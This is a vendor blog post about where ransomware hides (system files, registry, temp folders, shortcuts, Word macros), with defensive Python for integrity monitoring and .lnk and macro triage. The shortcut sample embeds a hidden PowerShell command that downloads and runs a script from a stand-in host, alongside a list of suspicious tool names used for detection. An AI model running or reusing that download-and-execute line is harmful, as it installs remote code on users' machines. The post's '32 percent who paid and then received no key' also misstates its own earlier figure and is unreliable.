While many cybercriminals execute data breaches and attacks in a matter of hours or less, others prefer a long-haul approach, harvesting sensitive and protected information over months or years. The recent surge in social engineering, advanced persistent threats (APTs), ransomware, and other sophisticated cybercrime shows that previously unseen malware and ransomware are a means to an end: financial gain, or disruption of the targeted organization's services.

In 2021, 37 percent of the businesses and organizations surveyed were hit by ransomware. Of those, 32 percent paid the ransom, yet on average only 65 percent of the encrypted data was recovered, according to the Sophos report The State of Ransomware 2021. The latest threats are characterized by their ability to remain undetected on a company's network for long periods; in some cases criminals have gone unnoticed for years. Ponemon's 2021 report found that a breach takes 212 days on average to detect and another 75 days to contain.

How Does Ransomware Work?

In order to understand how to solve the problem of ransomware, we must first understand how it works. A ransomware attack can be described in four stages. Stages 1 and 2, the initial intrusion and the delivery and execution of the payload, are where the APT is established.

Ransomware Stages

For years, Stage 1 defenses have failed to keep intruders out. Consistent with the assume-breach stance of NIST SP 800-207, Zero Trust Architecture, organizations should assume at all times that there is a malicious presence inside their environment. Given this assumption, a malicious actor present on a network can really only do one of two things:

  1. They can snoop around and try to exfiltrate data, or
  2. They can add, modify or delete system files, directories, configurations, policies, users, etc… 

Spoiler alert: ransomware is simply a software package, or payload, that must first be "added" to an infrastructure and then "executed." It is the execution of the payload that encrypts critical files until they are unreadable and/or degrades the operational stability of the target systems.

Malware vs Ransomware

Ransomware is a form of malware. Other types include Trojans, spyware, adware, rootkits, worms, and keyloggers. Each has a nefarious purpose: gaining access to privileged information, disrupting IT operations, or simply denying access by encrypting files and demanding a ransom in exchange for the decryption key. But be warned: paying is no guarantee. Don't join the 32 percent who paid and then received no key, or a key that did not restore everything to its original state.

Security teams need to prepare for continued efforts by bad actors looking to reap financial gains with ransomware as their malware of choice. Join us as we review where APTs, ransomware, and other sophisticated malware can hide in your network and how to prepare to protect your organization.



Where Malware and Ransomware May Hide

1. Critical System Files

One of the most dangerous and inconspicuous places highly sophisticated malware can hide is among your critical system files. Traditionally, malicious files that replaced or modified existing system files could be distinguished by a foreign or missing signature: on Windows, the Authenticode signature lives in the attribute certificate table of a signed PE file, so a tampered file either fails signature verification or carries a signer the original did not.

While steganography and other concealment techniques used by highly sophisticated cybercriminals can bypass most traditional detection methods, they still leave traces. Technology that detects changes in file size and file contents, not just in signatures, can catch these changes, including an in-place patch that leaves the file the same length.
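The core of that detection is a trusted baseline of size and content hash per file, diffed against a fresh snapshot. The following is an added example written for this article, not CimTrak's code or any vendor's: it baselines a constructed directory tree standing in for "critical system files" (the file names and contents are invented) and then classifies four kinds of tampering, separating out the same-size patch that a size-only monitor would miss.

```python
import hashlib
import os
import stat
import tempfile


def _sha256(path, chunk=1 << 16):
    """Hash a file in chunks so large binaries don't have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Return {relative_path: (size, sha256)} for every regular file under root.

    Symlinks are skipped on purpose: following them would let an attacker
    point a monitored name at an innocent file while the real one changes.
    """
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = (st.st_size, _sha256(full))
    return baseline


def diff(baseline, current):
    """Classify drift between a trusted baseline and a fresh snapshot.

    'same_size_modified' is the bucket a size-only monitor would miss:
    an in-place patch that overwrites bytes without changing the length.
    """
    report = {"added": [], "removed": [], "modified": [], "same_size_modified": []}
    for rel in sorted(set(baseline) | set(current)):
        old, new = baseline.get(rel), current.get(rel)
        if old is None:
            report["added"].append(rel)
        elif new is None:
            report["removed"].append(rel)
        elif old != new:
            bucket = "same_size_modified" if old[0] == new[0] else "modified"
            report[bucket].append(rel)
    return report


def demo():
    """Constructed scenario: baseline a fake system tree, tamper with it, diff."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)

        # Stand-ins for critical system files (constructed, not real binaries).
        write("system32/ntoskrnl.bin", b"A" * 4096)
        write("system32/drivers/disk.bin", b"B" * 1024)
        write("etc/hosts", b"127.0.0.1 localhost\n")
        trusted = snapshot(root)

        # Four kinds of tampering an intruder at Stage 2 might perform:
        write("system32/ntoskrnl.bin", b"A" * 4000 + b"\x90" * 96)        # same-size patch
        write("etc/hosts", b"127.0.0.1 localhost\n0.0.0.0 av.example\n")   # content grew
        os.remove(os.path.join(root, "system32", "drivers", "disk.bin"))  # file removed
        write("system32/drivers/evil.bin", b"MZ" + b"\0" * 62)              # file dropped
        return diff(trusted, snapshot(root))


if __name__ == "__main__":
    for bucket, paths in demo().items():
        print(f"{bucket:>19}: {paths}")
```

In production the baseline would be written at a known-good moment, stored where the monitored host cannot rewrite it, and the hash would be checked on every write event rather than on a polling walk; the classification logic stays the same.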

2. Windows Registry

Some malware modifies Windows Registry keys to establish a position among the "autoruns," so that it launches each time the operating system starts. Red Canary's Andy Rothman has noted that it is increasingly common for attackers to use registry values to store and hide next-stage code for malware after the initial dropper has landed on a system.

Manually auditing Windows Registry keys for abnormalities is a massive undertaking: it would in theory require comparing logs against tens of thousands of autorun settings. While there are some shortcuts, efficiently determining which registry keys have been modified is typically best achieved with an effective file integrity monitoring solution.

3. Temporary Folders

Operating systems contain a host of temporary folders, ranging from internet caches to application data. These folders are an inherent part of the OS, letting the system stage and compress data to support the user experience. By default they are typically writable by all users, to enable internet browsing, the creation of Excel spreadsheets, and other common activities.

Because of this loose security, temporary folders are a common landing place for malware and ransomware as soon as criminals gain entry to a system via phishing, an exploit, or another method. Ransomware and malware may use a temporary folder as a launchpad to execute immediately, or to establish further strongholds within a company's network through privilege escalation and other means.

4. .lnk Files

Windows shortcut files, also known simply as "shortcuts," contain a path to a target, which may be a malware- or ransomware-laden website or, more dangerously, an executable with attacker-supplied arguments. Chances are your employees have quite a few of these on their desktops to ease access to commonly used web applications and other tools.

Both malware and ransomware can gain a foothold after download through cleverly disguised .lnk files that resemble an existing shortcut or even an innocuous PDF document. Unfortunately, the average end user cannot tell the difference, because Explorer never displays the .lnk extension, even when other extensions are shown.
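What the user cannot see in Explorer is easy to read out of the file itself. The following is an added example, not from the original post, that parses the Shell Link header and StringData fields per the MS-SHLLINK layout (the only fields it needs; it skips the optional ID list and LinkInfo blocks) and applies a few triage heuristics. Both shortcuts it inspects are constructed in the block: one ordinary browser shortcut and one "Invoice.pdf.lnk" whose real target is PowerShell; the download URL in it is invented.

```python
import struct

# Field layout per the MS-SHLLINK specification; only what is parsed below is relied on.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWNORMAL = 1
STRING_FIELDS = (                     # StringData blocks appear in exactly this order
    (HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
    (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"),
)
SUSPECT_TOKENS = ("powershell", "mshta", "rundll32", "regsvr32", "wscript", "cscript",
                  "cmd.exe", "cmd /c", "certutil", "-enc", "-e ", "http://", "https://",
                  "%temp%", "\\appdata\\local\\temp\\")


def build_lnk(relative_path, arguments="", working_dir="", show_command=SW_SHOWNORMAL):
    """Construct a minimal Shell Link (no IDList, no LinkInfo) so the parser can be exercised."""
    flags = HAS_RELPATH | IS_UNICODE
    flags |= HAS_WORKDIR if working_dir else 0
    flags |= HAS_ARGS if arguments else 0
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 x FILETIME, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1, Reserved2, Reserved3  -> 76 bytes
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def sd(s):                        # StringData: UTF-16 char count, then the chars, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = sd(relative_path)
    body += sd(working_dir) if working_dir else b""
    body += sd(arguments) if arguments else b""
    return header + body


def parse_lnk(data):
    """Extract what the user never sees: the real target, its arguments and the window mode."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    off = 0x4C
    if flags & HAS_IDLIST:                        # skip LinkTargetIDList: uint16 size + items
        size, = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINKINFO:                      # skip LinkInfo: its uint32 size includes itself
        size, = struct.unpack_from("<I", data, off)
        off += size
    info = {"show_command": show_command}
    for flag, field in STRING_FIELDS:
        info[field] = None
        if flags & flag:
            count, = struct.unpack_from("<H", data, off)
            off += 2
            if flags & IS_UNICODE:
                info[field] = data[off:off + 2 * count].decode("utf-16-le", "replace")
                off += 2 * count
            else:
                info[field] = data[off:off + count].decode("cp1252", "replace")
                off += count
    return info


def assess(info):
    """Heuristics a mail gateway or EDR rule would apply to a parsed shortcut."""
    findings = []
    if info["show_command"] != SW_SHOWNORMAL:
        findings.append(f"window not shown normally (ShowCommand={info['show_command']})")
    haystack = " ".join(filter(None, (info["relative_path"], info["arguments"]))).lower()
    for token in SUSPECT_TOKENS:
        if token in haystack:
            findings.append(f"target/arguments contain {token!r}")
    if info["arguments"] and len(info["arguments"]) > 200:
        findings.append("unusually long argument string")
    return findings


# Constructed samples: a normal browser shortcut and a "PDF" that is really a PowerShell launcher.
BENIGN = build_lnk(r"..\..\Program Files\Mozilla Firefox\firefox.exe")
PAYLOAD_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://invoice.example/s.ps1')"
DISGUISED = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                      arguments='-w hidden -nop -c "' + PAYLOAD_CMD + '"',
                      show_command=7)                       # SW_SHOWMINNOACTIVE: no visible window

if __name__ == "__main__":
    for label, blob in (("Firefox.lnk", BENIGN), ("Invoice.pdf.lnk", DISGUISED)):
        info = parse_lnk(blob)
        print(label, "->", info["relative_path"], info["arguments"] or "", assess(info))
```

Real shortcuts almost always carry an ID list and LinkInfo, which is why the parser skips those blocks by their size fields rather than assuming the StringData starts right after the header.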

5. Word Files

Even relatively low-grade spam filters recognize .exe attachments as potentially malicious. Cybercriminals have adapted by abusing Microsoft Office VBA macros to embed ransomware downloaders in Word documents, as KnowBe4 has documented. Locky ransomware was delivered this way: the macro drops its payload into a temporary folder, executes it, encrypts the victim's data, and presents the ransom demand.
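Blocking on the file extension alone misses a macro-enabled document, so a gateway should look at the container's contents. The following is an added example, not part of the original post, that decides from the bytes whether an Office document carries a VBA project: for OOXML (.docx/.docm) it checks for the vbaProject.bin part and the macro-enabled content types; for legacy OLE2 files it uses a crude but cheap check for the VBA storage names. The sample documents are constructed placeholders, not real Word output, and the legacy check is a heuristic, not a full compound-file parser.

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"          # legacy .doc/.xls compound file signature
MACRO_FREE_EXTS = {"docx", "dotx", "xlsx", "xltx", "pptx", "potx"}


def inspect_office_file(data):
    """Decide by content, not by file name, whether an Office document carries VBA."""
    result = {"container": None, "has_macros": False, "evidence": []}
    if data[:2] == b"PK":                                  # OOXML is a zip package
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
                result["container"] = "ooxml"
                for n in names:
                    if n.lower().endswith("vbaproject.bin"):
                        result["has_macros"] = True
                        result["evidence"].append("part " + n)
                if "[Content_Types].xml" in names:
                    types = z.read("[Content_Types].xml").decode("utf-8", "replace")
                    for marker in ("vnd.ms-office.vbaProject", "macroEnabled.main+xml"):
                        if marker in types:
                            result["has_macros"] = True
                            result["evidence"].append("content type " + marker)
        except zipfile.BadZipFile:
            result["container"] = "zip (corrupt)"
    elif data[:8] == OLE_MAGIC:
        result["container"] = "ole2"
        # Heuristic: the VBA storage names appear as UTF-16 in the directory stream.
        for marker in ("_VBA_PROJECT", "Macros"):
            if marker.encode("utf-16-le") in data:
                result["has_macros"] = True
                result["evidence"].append("directory entry " + marker)
    return result


def triage(filename, data):
    """Return (details, verdict) a mail gateway could attach to an attachment."""
    info = inspect_office_file(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    verdict = []
    if info["container"] is None:
        verdict.append("not an Office container")
    if info["has_macros"]:
        verdict.append("contains a VBA project")
        if ext in MACRO_FREE_EXTS:
            verdict.append(f"macro content behind a macro-free extension .{ext}")
    return info, verdict


# Constructed sample documents (placeholders, not real Word output).
def make_ooxml(with_macros):
    main_type = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_macros
                 else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    types = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
             f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>')
    if with_macros:
        types += '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>'
    types += "</Types>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            z.writestr("word/vbaProject.bin", OLE_MAGIC + b"\0" * 56)   # vbaProject.bin is itself OLE2
    return buf.getvalue()


def make_ole(with_macros):
    body = OLE_MAGIC + b"\0" * 504                                      # one 512-byte header sector
    if with_macros:
        body += "Macros".encode("utf-16-le") + b"\0" * 52 + "_VBA_PROJECT".encode("utf-16-le")
    return body


if __name__ == "__main__":
    for name, blob in (("report.docx", make_ooxml(False)), ("invoice.docm", make_ooxml(True)),
                       ("invoice.docx", make_ooxml(True)), ("legacy.doc", make_ole(True))):
        print(name, triage(name, blob)[1])
```

A document flagged "contains a VBA project" is not automatically malicious; the useful policy is to quarantine macro-bearing attachments from external senders and to treat a macro project hiding behind a .docx name as a strong signal on its own.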

Protecting Your Organization Against the Sneakiest Malware and Ransomware

For the past two decades, organizations have protected themselves with endpoint protection and anti-virus technologies built on denylisting. This approach has proven reactive and ineffective: it cannot identify or prevent roughly 550,000 of the estimated 1 million new malware variants released per day.

So what's the alternative? Address the problem, not the symptom. The symptom has always been the primary focus: business disruption from an attack or breach, answered with an Incident Response Plan (IRP), a Disaster Recovery Plan (DRP), and a Business Continuity Plan (BCP) to return operations to their pre-infection state. While these have their benefits, they rely on a backup and reprovisioning process that can take hours or days, and even then data and transactions can and will be lost.

Addressing the Problem

If we assume there is virtually no way to prevent 100 percent of Stage 1 intrusions, then Stage 2 is where the solution lies.

Today's security landscape demands smarter, more efficient solutions that monitor every aspect of your files, beyond signatures and surface appearances. With CimTrak, security personnel can see malicious changes to Windows Registry keys, critical system file contents, and the other hiding places above the moment they occur. Not only can you achieve full oversight and control, you can also remediate changes from the administrative console, manually or automatically, back to the last known trusted baseline. CimTrak detects and responds in seconds.

To learn more about CimTrak's advanced protection against all forms of malware and ransomware, download our report, Defending Against Ransomware with System Integrity Assurance today.


Post by Lauren Yacono
February 7, 2023
Lauren is an IU graduate and Chicagoland-based Marketing Specialist.

About Cimcor

Cimcor's File Integrity Monitoring solution, CimTrak, helps enterprise IT and security teams secure critical assets and simplify compliance. Easily identify, prohibit, and remediate unknown or unauthorized changes in real time.